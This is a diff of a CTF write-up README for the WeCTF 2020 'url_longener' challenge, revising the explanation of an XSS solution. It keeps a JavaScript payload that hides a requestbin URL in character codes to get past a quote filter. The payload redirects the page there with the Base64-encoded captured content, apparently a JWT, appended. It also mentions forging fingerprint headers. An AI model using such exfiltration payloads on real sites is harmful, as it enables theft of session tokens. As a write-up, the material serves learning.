dshynkev/ctf-writeups/2020/wectf/url_longener/README.md

 }
 const content = `;foo()//
 ```
-This is almost what we want, except that we're not allowed single or double quotes for the URL,
-and using backticks would break `content`.
+This is almost what we want, except that we're not allowed single or double quotes, and using backticks would break `content`.
-There may have been a smarter solution, but we ended up just rewriting the code as
+There may have been a smarter solution, but we ended up just rewriting the code:
 ```js
 function f(){a=[104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,55,122,50,101,117,56,49,63,99,61];s=a.map(function(c){return String.fromCharCode(c)}).join([]);location=s+btoa(t);}t=`;f()//
 ```
-And this is nearly all there was to it: after getting the JWT, by serving the supplied [index.html](./index.html),
+Now, finally, this is nearly all there was to it: after getting the JWT by serving the supplied [index.html](./index.html),
 we run [request.py](./request.py) which sets the headers needed for the fingerprint.

 The last step frustrated us somewhat, as we hadn't considered that we might not need `X-Forwarded-For`.